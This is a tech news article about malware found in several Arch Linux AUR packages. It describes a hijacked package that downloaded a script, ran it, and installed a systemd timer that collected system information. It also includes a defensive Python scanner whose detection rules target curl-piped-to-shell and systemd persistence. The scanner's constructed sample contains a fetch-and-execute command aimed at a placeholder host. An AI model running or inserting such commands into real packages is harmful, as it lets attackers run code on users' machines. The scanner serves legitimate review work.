Malicious Code Found in Arch Linux AUR Repository


Arch Linux’s AUR package repository has been found to contain malware. It was discovered in one of the user-submitted packages, and the malicious code was removed immediately once the AUR team intervened. The incident occurred because the AUR team allows users to contribute to abandoned repositories.

The malicious code was found on Saturday, when a user discovered that an account using the pseudonym “xeactor” had overridden a package named “acroread”, which lets Arch users view PDF files on their system.

The Git commit log shows that the newly packaged malicious code downloads a file named “~x” from ptpb.pw, a lightweight service that allows users to share small pieces of text, and then executes another file named “~u”. The main purpose of the file is to modify systemd and add a timer that runs the “~u” file every 360 seconds.

The “~u” file collects the date, time, machine ID, CPU information, Pacman (package manager) information and the entire output of the commands “uname -a” and “systemctl list-units”.
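
A heuristic review aid for the pattern described above, added here as an example and not taken from the AUR team or the original report: it flags lines in a PKGBUILD or .install script that fetch remote content, pipe it into a shell, or touch systemd units, so they can be read by hand before building. The rule set, the function name `audit` and the sample package (with its `example.invalid` host) are assumptions of this example, and the sample is constructed.

```python
import re

# Heuristic rules chosen for this example (assumptions, not an official AUR check).
RULES = [
    # A download whose output is piped straight into a shell interpreter.
    ("fetch-piped-to-shell",
     re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(ba|da|z)?sh\b")),
    # Any download run from a function: it bypasses source=() and its checksums.
    ("network-fetch-in-script",
     re.compile(r"\b(curl|wget)\b")),
    # Unit or timer handling that could give a script periodic execution.
    ("systemd-persistence",
     re.compile(r"systemctl\s+(enable|start|daemon-reload)|/systemd/system/|\.timer\b")),
]


def audit(text):
    """Return (line_no, rule, line) for each line that deserves manual review."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # skip blanks and comments
        for name, rx in RULES:
            if rx.search(stripped):
                findings.append((no, name, stripped))
    return findings


# Constructed sample: a harmless-looking package with a tampered install hook.
SAMPLE = """\
pkgname=example-viewer
pkgver=1.0
source=("https://example.invalid/example-viewer-1.0.tar.gz")
package() {
  install -Dm755 viewer "$pkgdir/usr/bin/viewer"
}
post_install() {
  curl -s https://paste.example.invalid/x | bash -
  systemctl enable example.timer
}
"""

if __name__ == "__main__":
    for no, rule, line in audit(SAMPLE):
        print(f"line {no}: {rule}: {line}")
```

Packages that legitimately ship systemd units will also trigger the last rule, so a hit means "read this line", not "this package is malicious".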

The AUR team have also said they have found similar code in other packages:

  • acroread 9.5.5-8
  • balz 1.20-3
  • minergate 8.1-2

The malicious code changes were reverted and xeactor’s accounts were suspended. AUR packages are user-submitted packages for the Arch Linux Repo. There have been a lot of cases this year in which most of the code of an operating system has been affected by some sort of malware.

I am a programmer and tech enthusiast who loves to use my creative skills to solve complex solutions. I also love to stay abreast of what is happening in the world of technology, reach me at: [email protected]

Harikrishna Mekala
